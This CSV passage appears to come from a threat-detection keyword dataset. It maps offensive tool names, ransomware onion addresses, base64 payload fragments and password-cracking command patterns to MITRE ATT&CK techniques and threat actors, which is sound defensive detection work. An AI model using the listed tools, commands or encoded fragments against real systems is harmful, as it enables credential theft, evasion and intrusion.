"*jbdg4buq6jd7ed3rd6cynqtq5abttuekjnxqrqyvk4xam5i7ld33jvqd.onion*",".{0,1000}jbdg4buq6jd7ed3rd6cynqtq5abttuekjnxqrqyvk4xam5i7ld33jvqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50036"
"*jbeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion*",".{0,1000}jbeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50037"
"*jblndlipeogpafnldhgmapagcccfchpi*",".{0,1000}jblndlipeogpafnldhgmapagcccfchpi.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50038"
"*jboss_jmx_upload_exploit*",".{0,1000}jboss_jmx_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50040"
"*jdk*-activator-rce-test.txt*",".{0,1000}jdk.{0,1000}\-activator\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50042"
"*jdk*-call-rce-test.txt*",".{0,1000}jdk.{0,1000}\-call\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50043"
"*jdk*-dgc-rce-test.txt*",".{0,1000}jdk.{0,1000}\-dgc\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50044"
"*jdk*-method-rce-test.txt*",".{0,1000}jdk.{0,1000}\-method\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50045"
"*jdk*-reg-bypass.txt*",".{0,1000}jdk.{0,1000}\-reg\-bypass\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","50046"
"*jdwp-shellifier.py -t * -p * --cmd *",".{0,1000}jdwp\-shellifier\.py\s\-t\s.{0,1000}\s\-p\s.{0,1000}\s\-\-cmd\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50047"
"*Jecretz, Jira Secrets Hunter*",".{0,1000}Jecretz,\sJira\sSecrets\sHunter.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","50048"
"*jeffhacks/smbscan*",".{0,1000}jeffhacks\/smbscan.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","1","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","50050"
"*jfjallid/go-lsass*",".{0,1000}jfjallid\/go\-lsass.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","50052"
"*jfjallid/go-secdump*",".{0,1000}jfjallid\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","50053"
"*JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw==*",".{0,1000}JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50054"
"*JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB*",".{0,1000}JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","50055"
"*JGillam/burp-co2*",".{0,1000}JGillam\/burp\-co2.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","50057"
"*JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl*",".{0,1000}JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","50058"
"*JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ==*",".{0,1000}JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ\=\=.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","50059"
"*jianingy/proxychains*",".{0,1000}jianingy\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","50060"
"*Jira-Lens.py*",".{0,1000}Jira\-Lens\.py.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","50061"
"*jmarr73/NTLMSleuth*",".{0,1000}jmarr73\/NTLMSleuth.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","50064"
"*jmmcatee/cracklord*",".{0,1000}jmmcatee\/cracklord.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","50065"
"*JMousqueton/PoC-CVE-2022-30190*",".{0,1000}JMousqueton\/PoC\-CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","N/A","2","157","55","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z","50066"
"*jmp_hijack_thread(*",".{0,1000}jmp_hijack_thread\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","50067"
"*jndi_injection.rb*",".{0,1000}jndi_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50068"
"*JNDI-Injection-Exploit*",".{0,1000}JNDI\-Injection\-Exploit.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","50069"
"*joaoviictorti/RustRedOps*",".{0,1000}joaoviictorti\/RustRedOps.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","50070"
"*JOB COMPLETE: GO GET YOUR LOOT!*",".{0,1000}JOB\sCOMPLETE\:\sGO\sGET\sYOUR\sLOOT!.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","50071"
"*Job killed and console drained*",".{0,1000}Job\skilled\sand\sconsole\sdrained.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","50072"
"*Joe1sn/S-inject*",".{0,1000}Joe1sn\/S\-inject.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","50073"
"*JoelGMSec - https://darkbyte.net*",".{0,1000}JoelGMSec\s\-\shttps\:\/\/darkbyte\.net.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50074"
"*JoelGMSec/EvilnoVNC*",".{0,1000}JoelGMSec\/EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50075"
"*JoelGMSec/HTTP-Shell*",".{0,1000}JoelGMSec\/HTTP\-Shell.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","50076"
"*JoelGMSec/Invoke-Stealth*",".{0,1000}JoelGMSec\/Invoke\-Stealth.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","50077"
"*JoelGMSec/PSAsyncShell*",".{0,1000}JoelGMSec\/PSAsyncShell.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","50078"
"*JoelGMSec/PSRansom*",".{0,1000}JoelGMSec\/PSRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","50079"
"*Joey is the best hacker in Hackers*",".{0,1000}Joey\sis\sthe\sbest\shacker\sin\sHackers.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50081"
"*john * --incremental*",".{0,1000}john\s.{0,1000}\s\-\-incremental.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50082"
"*john * -w=*",".{0,1000}john\s.{0,1000}\s\-w\=.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50083"
"*john * --wordlist=*",".{0,1000}john\s.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50084"
"*john *-groups*",".{0,1000}john\s.{0,1000}\-groups.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50085"
"*john *htdigest*",".{0,1000}john\s.{0,1000}htdigest.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50086"
"*john *-inc *",".{0,1000}john\s.{0,1000}\-inc\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50087"
"*john *-incremental *",".{0,1000}john\s.{0,1000}\-incremental\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50088"
"*john *-shells*",".{0,1000}john\s.{0,1000}\-shells.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50089"
"*john *-show*",".{0,1000}john\s.{0,1000}\-show.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50090"
"*john *-single*",".{0,1000}john\s.{0,1000}\-single.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50091"
"*john *-users*",".{0,1000}john\s.{0,1000}\-users.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50092"
"*john *-wordlist*",".{0,1000}john\s.{0,1000}\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50093"
"*john *--wordlist*",".{0,1000}john\s.{0,1000}\-\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50094"
"*john --format=*",".{0,1000}john\s\-\-format\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50095"
"*john hashes*",".{0,1000}john\shashes.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50096"
"*john NTDS.dit*",".{0,1000}john\sNTDS\.dit.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50097"
"*john --show *",".{0,1000}john\s\-\-show\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50098"
"*john --status*",".{0,1000}john\s\-\-status.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50099"
"*John the Ripper*",".{0,1000}John\sthe\sRipper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50100"
"*john --wordlist*",".{0,1000}john\s\-\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50101"
"*john --wordlist=*",".{0,1000}john\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50102"
"*John*the*Ripper*",".{0,1000}John.{0,1000}the.{0,1000}Ripper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50103"
